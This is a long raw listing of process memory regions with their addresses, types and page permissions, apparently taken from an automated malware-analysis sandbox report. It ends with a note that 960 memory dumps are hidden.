page read and write
1FFE3E6A000
heap
page read and write
7FFAAC310000
trusted library allocation
page read and write
1D52F64C000
heap
page read and write
AED18BE000
stack
page read and write
7FFAAC31C000
trusted library allocation
page execute and read and write
27D738B0000
trusted library allocation
page read and write
27D758F0000
heap
page read and write
1C6D62F5000
heap
page read and write
1C6D6377000
heap
page read and write
50A3000
heap
page read and write
CA9000
heap
page read and write
1D52F65E000
heap
page read and write
52AC000
stack
page read and write
27D75677000
heap
page execute and read and write
1D52EEB4000
heap
page read and write
4AD8000
trusted library allocation
page read and write
10A4000
trusted library allocation
page read and write
1D52D487000
heap
page read and write
27D7372E000
heap
page read and write
1FFE3E61000
heap
page read and write
7FFAAC412000
trusted library allocation
page read and write
20091E90000
heap
page read and write
20091BA7000
heap
page read and write
7FFAAC520000
trusted library allocation
page read and write
27D7371F000
heap
page read and write
7FFAAC540000
trusted library allocation
page read and write
7FFAAC550000
trusted library allocation
page read and write
1C6D4411000
heap
page read and write
1D52EEBA000
heap
page read and write
39724FE000
stack
page read and write
7FFAAC500000
trusted library allocation
page read and write
10BD000
trusted library allocation
page execute and read and write
AED14FD000
stack
page read and write
27D75952000
heap
page read and write
1D52F67E000
heap
page read and write
5796000
heap
page read and write
1D52EE78000
heap
page read and write
5890000
trusted library allocation
page read and write
1FFE620B000
trusted library allocation
page read and write
7FFAAC570000
trusted library allocation
page read and write
1C6D6312000
heap
page read and write
7FFAAC4B0000
trusted library allocation
page read and write
1D52F7F4000
heap
page read and write
7FFAAC263000
trusted library allocation
page execute and read and write
73D16000
unkown
page readonly
1C6D4505000
heap
page read and write
1FFE5DA7000
trusted library allocation
page read and write
664ABFE000
stack
page read and write
1D52F590000
remote allocation
page read and write
1D52EE7A000
heap
page read and write
1C6D62F5000
heap
page read and write
7FFAAC330000
trusted library allocation
page execute and read and write
7FFAAC326000
trusted library allocation
page read and write
1D52F679000
heap
page read and write
1D52F659000
heap
page read and write
1D52F67F000
heap
page read and write
10D7000
trusted library allocation
page execute and read and write
1FFE3EAB000
heap
page read and write
7FFAAC316000
trusted library allocation
page read and write
AED147E000
stack
page read and write
1FFE3DB0000
heap
page read and write
C2D2FFF000
stack
page read and write
1C6D631B000
heap
page read and write
AED240E000
stack
page read and write
39726FE000
stack
page read and write
1C6D441A000
heap
page read and write
1D52F654000
heap
page read and write
1D52EECB000
heap
page read and write
1D52D44E000
heap
page read and write
1D52F630000
heap
page read and write
7FFAAC5C0000
trusted library allocation
page read and write
EC7000
heap
page read and write
2008FBB4000
heap
page read and write
C2D3078000
stack
page read and write
1D52EEC7000
heap
page read and write
1FFE3E2B000
heap
page read and write
1C6D637A000
heap
page read and write
26F65430000
heap
page read and write
1C6D632B000
heap
page read and write
1D52D4BD000
heap
page read and write
57C5000
heap
page read and write
3AD9000
trusted library allocation
page read and write
1D52F7D1000
heap
page read and write
1D52F352000
heap
page read and write
1D52D4B0000
heap
page read and write
7FFAAC442000
trusted library allocation
page read and write
CA6000
heap
page read and write
3AF9000
trusted library allocation
page read and write
1D52D44D000
heap
page read and write
F8B000
heap
page read and write
1D52F6BA000
heap
page read and write
1C6D4420000
heap
page read and write
2930000
trusted library allocation
page execute and read and write
20091BA0000
heap
page read and write
1D52F804000
heap
page read and write
2BE0000
trusted library allocation
page read and write
10B0000
trusted library allocation
page read and write
1FFFDDDC000
heap
page read and write
1D52EE63000
heap
page read and write
1D52F654000
heap
page read and write
1D52EECF000
heap
page read and write
1D52F346000
heap
page read and write
1D52F65E000
heap
page read and write
7FFAAC580000
trusted library allocation
page read and write
27D738E0000
heap
page execute and read and write
7FFB1DE16000
unkown
page readonly
2B05000
trusted library allocation
page read and write
1FFE5DB4000
trusted library allocation
page read and write
6390000
trusted library allocation
page execute and read and write
20091BCC000
heap
page read and write
1FFE6199000
trusted library allocation
page read and write
1C6D634B000
heap
page read and write
1D52F67E000
heap
page read and write
1C6D6314000
heap
page read and write
20091BC4000
heap
page read and write
C2D2D7E000
stack
page read and write
1D52F69E000
heap
page read and write
20091BFA000
heap
page read and write
C2D30F6000
stack
page read and write
27D73954000
heap
page read and write
1D52F6BE000
heap
page read and write
1D52EE89000
heap
page read and write
27D10072000
trusted library allocation
page read and write
27D00580000
trusted library allocation
page read and write
1D52D4D1000
heap
page read and write
AED17BE000
stack
page read and write
7FFB23B20000
unkown
page read and write
2B46000
trusted library allocation
page read and write
7FFB1DE20000
unkown
page read and write
2BB0000
trusted library allocation
page read and write
90B85FE000
stack
page read and write
A5A000
stack
page read and write
2BC0000
trusted library allocation
page read and write
20091B92000
heap
page read and write
27D73721000
heap
page read and write
27D01415000
trusted library allocation
page read and write
1D52F67A000
heap
page read and write
20091BE9000
heap
page read and write
2A92000
trusted library allocation
page read and write
43E000
remote allocation
page execute and read and write
1D52D4A8000
heap
page read and write
636E000
stack
page read and write
1D52F699000
heap
page read and write
1D52D420000
heap
page read and write
20091BF1000
heap
page read and write
1FFE6085000
trusted library allocation
page read and write
27D01951000
trusted library allocation
page read and write
39729FC000
stack
page read and write
1C6D6311000
heap
page read and write
1D52F69E000
heap
page read and write
1C6D6337000
heap
page read and write
1C6D635C000
heap
page read and write
20091BE4000
heap
page read and write
7FFAAC5FC000
trusted library allocation
page read and write
10DB000
trusted library allocation
page execute and read and write
6370000
trusted library allocation
page read and write
1D52EECF000
heap
page read and write
1D52F6AD000
heap
page read and write
20091A90000
heap
page read and write
1FFE5DB7000
trusted library allocation
page read and write
C2D2C7F000
stack
page read and write
1D52EE93000
heap
page read and write
1D52F628000
heap
page read and write
1D52EECF000
heap
page read and write
7FFAAC320000
trusted library allocation
page read and write
1D52D4A8000
heap
page read and write
7FFAAC5E1000
trusted library allocation
page read and write
1C6D81C0000
trusted library allocation
page read and write
1D52F69A000
heap
page read and write
AED250B000
stack
page read and write
1FFE60B4000
trusted library allocation
page read and write
1D52F663000
heap
page read and write
7FFAAC274000
trusted library allocation
page read and write
52EE000
stack
page read and write
1FFE3D90000
heap
page read and write
1D52EE7C000
heap
page read and write
1FFE5D01000
trusted library allocation
page read and write
1D52F6A5000
heap
page read and write
7FFAAC280000
trusted library allocation
page read and write
1D52EEC0000
heap
page read and write
1D52D465000
heap
page read and write
4C6D000
stack
page read and write
20091B73000
heap
page read and write
1D52EE7F000
heap
page read and write
1D52F824000
heap
page read and write
1D52D48C000
heap
page read and write
1FFE40C0000
trusted library allocation
page read and write
1C6D4445000
heap
page read and write
1D52F626000
heap
page read and write
1FFE5C90000
heap
page read and write
1D52EE7F000
heap
page read and write
1D52F7D7000
heap
page read and write
1D52D4F0000
heap
page read and write
1D52F43A000
heap
page read and write
7FFAAC27D000
trusted library allocation
page execute and read and write
7FFAAC26D000
trusted library allocation
page execute and read and write
7FFB23B16000
unkown
page readonly
27D00430000
trusted library allocation
page read and write
20091A30000
heap
page read and write
1C6D4419000
heap
page read and write
1C6D441A000
heap
page read and write
1D52EF07000
heap
page read and write
1D52F677000
heap
page read and write
1D52F698000
heap
page read and write
1D52EE4A000
heap
page read and write
1D52EE5D000
heap
page read and write
1D52D4C9000
heap
page read and write
1D52EE63000
heap
page read and write
1C6D441A000
heap
page read and write
1D52F650000
heap
page read and write
7FFAAC273000
trusted library allocation
page execute and read and write
7FFAAC5E3000
trusted library allocation
page read and write
1FFE40D0000
heap
page read and write
2A9A000
trusted library allocation
page read and write
1C6D633A000
heap
page read and write
7FFAAC380000
trusted library allocation
page execute and read and write
5798000
heap
page read and write
1C6D637A000
heap
page read and write
F2B000
heap
page read and write
26F65395000
heap
page read and write
7FFAAC570000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
2AA6000
trusted library allocation
page read and write
7FFAAC262000
trusted library allocation
page read and write
1D52EEB0000
heap
page read and write
1D52F65A000
heap
page read and write
1D52F682000
heap
page read and write
7FFB1DE00000
unkown
page readonly
1FFE5760000
heap
page execute and read and write
1D52F64B000
heap
page read and write
27D73870000
trusted library allocation
page read and write
1D52F676000
heap
page read and write
1FFE5D40000
trusted library allocation
page read and write
20091B91000
heap
page read and write
2BBA000
trusted library allocation
page read and write
1D52F7D8000
heap
page read and write
7FFAAC42A000
trusted library allocation
page read and write
1D52F824000
heap
page read and write
1D52F62C000
heap
page read and write
1FFE60A5000
trusted library allocation
page read and write
1D52D452000
heap
page read and write
1090000
trusted library allocation
page read and write
1D52EEB9000
heap
page read and write
7FFAAC41A000
trusted library allocation
page read and write
1D52F64D000
heap
page read and write
27D75766000
heap
page read and write
AED183E000
stack
page read and write
1D52EE5D000
heap
page read and write
C2D2E7C000
stack
page read and write
1FFE5CA1000
trusted library allocation
page read and write
3972AFD000
stack
page read and write
27D00520000
trusted library allocation
page read and write
1D52F636000
heap
page read and write
7FFAAC560000
trusted library allocation
page read and write
2A80000
trusted library allocation
page read and write
1C6D633F000
heap
page read and write
1C6D6415000
heap
page read and write
20091B7B000
heap
page read and write
10D2000
trusted library allocation
page read and write
20091A91000
heap
page read and write
1C6D637A000
heap
page read and write
1D52F5F8000
heap
page read and write
1D52D421000
heap
page read and write
7FFB1DE25000
unkown
page readonly
20091BA4000
heap
page read and write
1D52EECF000
heap
page read and write
1D52D4C8000
heap
page read and write
1D52D469000
heap
page read and write
27D73956000
heap
page read and write
27D0054A000
trusted library allocation
page read and write
7FFB1DE20000
unkown
page read and write
1FFFDDB7000
heap
page read and write
7FFAAC610000
trusted library allocation
page read and write
1C6D6357000
heap
page read and write
27D1000F000
trusted library allocation
page read and write
1D52D455000
heap
page read and write
1C6D637A000
heap
page read and write
1D52D48A000
heap
page read and write
7FFAAC4D0000
trusted library allocation
page read and write
1FFE5DB0000
trusted library allocation
page read and write
C2D347B000
stack
page read and write
1D52F6A1000
heap
page read and write
7FFAAC4C0000
trusted library allocation
page read and write
1FFFDDF0000
heap
page execute and read and write
27D75711000
heap
page read and write
1D52F65A000
heap
page read and write
1C6D4411000
heap
page read and write
1D52F69D000
heap
page read and write
1D52EE42000
heap
page read and write
1D52F695000
heap
page read and write
7FFAAC410000
trusted library allocation
page read and write
1D52EE88000
heap
page read and write
27D75978000
heap
page read and write
500C000
stack
page read and write
1D52F631000
heap
page read and write
1D52F64D000
heap
page read and write
63A0000
trusted library allocation
page execute and read and write
1C6D62F9000
heap
page read and write
27D01707000
trusted library allocation
page read and write
7FFB1DE25000
unkown
page readonly
10D0000
trusted library allocation
page read and write
7FFB1DE01000
unkown
page execute read
20091BBB000
heap
page read and write
1D52F649000
heap
page read and write
1D52D450000
heap
page read and write
27D01730000
trusted library allocation
page read and write
1D52F681000
heap
page read and write
1C6D6611000
heap
page read and write
1D52F7FB000
heap
page read and write
AED193E000
stack
page read and write
1C6D4510000
heap
page read and write
1FFE61C4000
trusted library allocation
page read and write
1D52F633000
heap
page read and write
1C6D4439000
heap
page read and write
1C6D632F000
heap
page read and write
1FFFDDEE000
heap
page read and write
10CA000
trusted library allocation
page execute and read and write
73D1F000
unkown
page readonly
7FFAAC320000
trusted library allocation
page execute and read and write
1D52EE46000
heap
page read and write
1FFE62E3000
trusted library allocation
page read and write
20091BF8000
heap
page read and write
1D52D4C3000
heap
page read and write
1D52EE60000
heap
page read and write
27D01AC6000
trusted library allocation
page read and write
1D52D4DB000
heap
page read and write
1C6D62E5000
heap
page read and write
1C6D637A000
heap
page read and write
27D75992000
heap
page read and write
1FFFDD9B000
heap
page read and write
27D757F0000
heap
page read and write
1147000
heap
page read and write
10C6000
trusted library allocation
page execute and read and write
2008FBA8000
heap
page read and write
20091F65000
heap
page read and write
1D52EE80000
heap
page read and write
1D52EF08000
heap
page read and write
20091BCC000
heap
page read and write
1D52EECF000
heap
page read and write
5300000
heap
page execute and read and write
1D52D46C000
heap
page read and write
7FFAAC400000
trusted library allocation
page read and write
1D52F6A6000
heap
page read and write
1D52F67E000
heap
page read and write
1D52F5F7000
heap
page read and write
EBB000
heap
page read and write
27D0197C000
trusted library allocation
page read and write
AED19BB000
stack
page read and write
F59000
heap
page read and write
1C6D6410000
heap
page read and write
26F65438000
heap
page read and write
1D52F648000
heap
page read and write
7FFAAC430000
trusted library allocation
page execute and read and write
7FFAAC470000
trusted library allocation
page read and write
AED1578000
stack
page read and write
27D0040C000
trusted library allocation
page read and write
1D52F665000
heap
page read and write
1FFFDEE0000
heap
page read and write
1D52EE85000
heap
page read and write
1D52EE42000
heap
page read and write
1FFF5CB0000
trusted library allocation
page read and write
7FFB1DE20000
unkown
page read and write
1FFE40D5000
heap
page read and write
1C6D4420000
heap
page read and write
1FFFDD73000
heap
page read and write
1D52F7F3000
heap
page read and write
AED0FFE000
stack
page read and write
1D52F663000
heap
page read and write
506E000
stack
page read and write
1D52D4C9000
heap
page read and write
1C6D5D60000
heap
page read and write
7FFAAC5A0000
trusted library allocation
page read and write
1FFFDD77000
heap
page read and write
1D52EECF000
heap
page read and write
1D52F697000
heap
page read and write
1D52F698000
heap
page read and write
E00000
heap
page read and write
27D75923000
heap
page read and write
1D52F43B000
heap
page read and write
C2D29EE000
stack
page read and write
2BD2000
trusted library allocation
page read and write
1D52F69A000
heap
page read and write
7FFAAC4B0000
trusted library allocation
page read and write
27D73766000
heap
page read and write
1D52F5C0000
heap
page read and write
27D7594B000
heap
page read and write
1D52D487000
heap
page read and write
10C0000
trusted library allocation
page read and write
27D739A0000
heap
page read and write
1FFE6070000
trusted library allocation
page read and write
27D00223000
trusted library allocation
page read and write
1D52D3F0000
heap
page read and write
7FFAAC450000
trusted library allocation
page execute and read and write
1D52EEB9000
heap
page read and write
1D52F628000
heap
page read and write
1D52F65A000
heap
page read and write
1D52D463000
heap
page read and write
7FFAAC5D0000
trusted library allocation
page read and write
20091BF8000
heap
page read and write
1D52F430000
heap
page read and write
1D52F352000
heap
page read and write
1FFE5CE9000
trusted library allocation
page read and write
1C6D6310000
heap
page read and write
3AD1000
trusted library allocation
page read and write
1D52D4C6000
heap
page read and write
1D52EE8B000
heap
page read and write
1D52EE7C000
heap
page read and write
1D52F65E000
heap
page read and write
1C6D4420000
heap
page read and write
1D52D490000
heap
page read and write
1FFE6094000
trusted library allocation
page read and write
7FFAAC4C0000
trusted library allocation
page read and write
20091BBB000
heap
page read and write
1D52F660000
heap
page read and write
2008FF50000
heap
page read and write
1D52F650000
heap
page read and write
2008FB7C000
heap
page read and write
1D52EE40000
heap
page read and write
27D7591C000
heap
page read and write
C2D33FE000
stack
page read and write
1D52EEB4000
heap
page read and write
1FFE5700000
trusted library allocation
page read and write
7FFAAC280000
trusted library allocation
page read and write
1C6D6326000
heap
page read and write
1D52F7FD000
heap
page read and write
1FFE3F1A000
heap
page read and write
1D52F5FB000
heap
page read and write
27D737E0000
heap
page read and write
7FFAAC272000
trusted library allocation
page read and write
1D52D4C9000
heap
page read and write
1D52EE75000
heap
page read and write
26F65530000
heap
page read and write
27D00408000
trusted library allocation
page read and write
1FFE3E81000
heap
page read and write
1FFFDDAB000
heap
page read and write
1FFE62DA000
trusted library allocation
page read and write
1D52F663000
heap
page read and write
1D52EF90000
heap
page read and write
1D52D41B000
heap
page read and write
7FFB1DE22000
unkown
page readonly
7FFAAC411000
trusted library allocation
page read and write
27D75504000
heap
page read and write
664A6FA000
stack
page read and write
7FFAAC356000
trusted library allocation
page execute and read and write
1D52EE5D000
heap
page read and write
20091BA7000
heap
page read and write
2008FB60000
heap
page read and write
2008FB81000
heap
page read and write
1C6D6316000
heap
page read and write
EAF000
heap
page read and write
1FFE3EA9000
heap
page read and write
1C6D62F9000
heap
page read and write
AED15BF000
stack
page read and write
1FFF5CA1000
trusted library allocation
page read and write
7FFAAC490000
trusted library allocation
page read and write
27D73830000
heap
page read and write
26F65370000
heap
page read and write
1D52EE92000
heap
page read and write
1D52F824000
heap
page read and write
AED16B9000
stack
page read and write
1D52F65F000
heap
page read and write
1C6D442B000
heap
page read and write
27D73900000
heap
page read and write
7FFB1DE01000
unkown
page execute read
1D52F6B6000
heap
page read and write
27D75CA0000
trusted library section
page read and write
1C6D62F1000
heap
page read and write
20091BBB000
heap
page read and write
20091B73000
heap
page read and write
1D52D46D000
heap
page read and write
27D75B50000
heap
page read and write
1D52EE73000
heap
page read and write
3972DFB000
stack
page read and write
1D52EE78000
heap
page read and write
50A0000
heap
page read and write
7FFAAC2BC000
trusted library allocation
page execute and read and write
1D52F7D0000
heap
page read and write
AED137D000
stack
page read and write
20091BCC000
heap
page read and write
20091BAC000
heap
page read and write
1D52F665000
heap
page read and write
1D52F675000
heap
page read and write
1C6D633A000
heap
page read and write
1D52EE98000
heap
page read and write
63D0000
heap
page read and write
27D7592A000
heap
page read and write
7FFAAC4D0000
trusted library allocation
page read and write
1D52F355000
heap
page read and write
664A9FF000
stack
page read and write
E98000
heap
page read and write
7FFAAC346000
trusted library allocation
page execute and read and write
20091B73000
heap
page read and write
2AA1000
trusted library allocation
page read and write
27D102FB000
trusted library allocation
page read and write
7FFAAC560000
trusted library allocation
page read and write
1C6D4500000
heap
page read and write
27D00434000
trusted library allocation
page read and write
1D52EE75000
heap
page read and write
7FFB1DE00000
unkown
page readonly
1C6D62F5000
heap
page read and write
7FFAAC580000
trusted library allocation
page read and write
58B7000
trusted library allocation
page read and write
1C6D62F9000
heap
page read and write
90B82FA000
stack
page read and write
2AD1000
trusted library allocation
page read and write
7FFB23B01000
unkown
page execute read
1D52F69A000
heap
page read and write
1D52EE89000
heap
page read and write
27D75985000
heap
page read and write
1D52EE9F000
heap
page read and write
1D52D45D000
heap
page read and write
27D75716000
heap
page read and write
1FFE3CB0000
heap
page read and write
1D52F650000
heap
page read and write
1D52F825000
heap
page read and write
1C6D5D64000
heap
page read and write
1D52F355000
heap
page read and write
1D52EE68000
heap
page read and write
1D52EE63000
heap
page read and write
1FFF5D11000
trusted library allocation
page read and write
1D52EE77000
heap
page read and write
1D52EEB9000
heap
page read and write
27D003F9000
trusted library allocation
page read and write
1FFE5CBB000
trusted library allocation
page read and write
7FFAAC510000
trusted library allocation
page read and write
2B96000
trusted library allocation
page read and write
2940000
trusted library allocation
page read and write
1D52F69D000
heap
page read and write
27D01755000
trusted library allocation
page read and write
1C6D4420000
heap
page read and write
1D52F64E000
heap
page read and write
7FFAAC4A0000
trusted library allocation
page read and write
E90000
heap
page read and write
7FFAAC4F0000
trusted library allocation
page read and write
1C6D440C000
heap
page read and write
27D73800000
heap
page read and write
3B37000
trusted library allocation
page read and write
200916D0000
heap
page read and write
7FFB1DE22000
unkown
page readonly
1C6D6323000
heap
page read and write
1C6D43D0000
heap
page read and write
1D52F67E000
heap
page read and write
27D73890000
trusted library allocation
page read and write
1D52D429000
heap
page read and write
1D52F636000
heap
page read and write
1D52EECF000
heap
page read and write
7FFB1DE01000
unkown
page execute read
200916D4000
heap
page read and write
27D7575A000
heap
page read and write
9A4FDAD000
stack
page read and write
7FFAAC4E0000
trusted library allocation
page read and write
1D52D4C3000
heap
page read and write
1C6D61B0000
heap
page read and write
C2D2EFE000
stack
page read and write
10A0000
trusted library allocation
page read and write
1D52D47D000
heap
page read and write
7FFAAC264000
trusted library allocation
page read and write
27D10001000
trusted library allocation
page read and write
C2D32FE000
stack
page read and write
There are 960 hidden memdumps, click here to show them.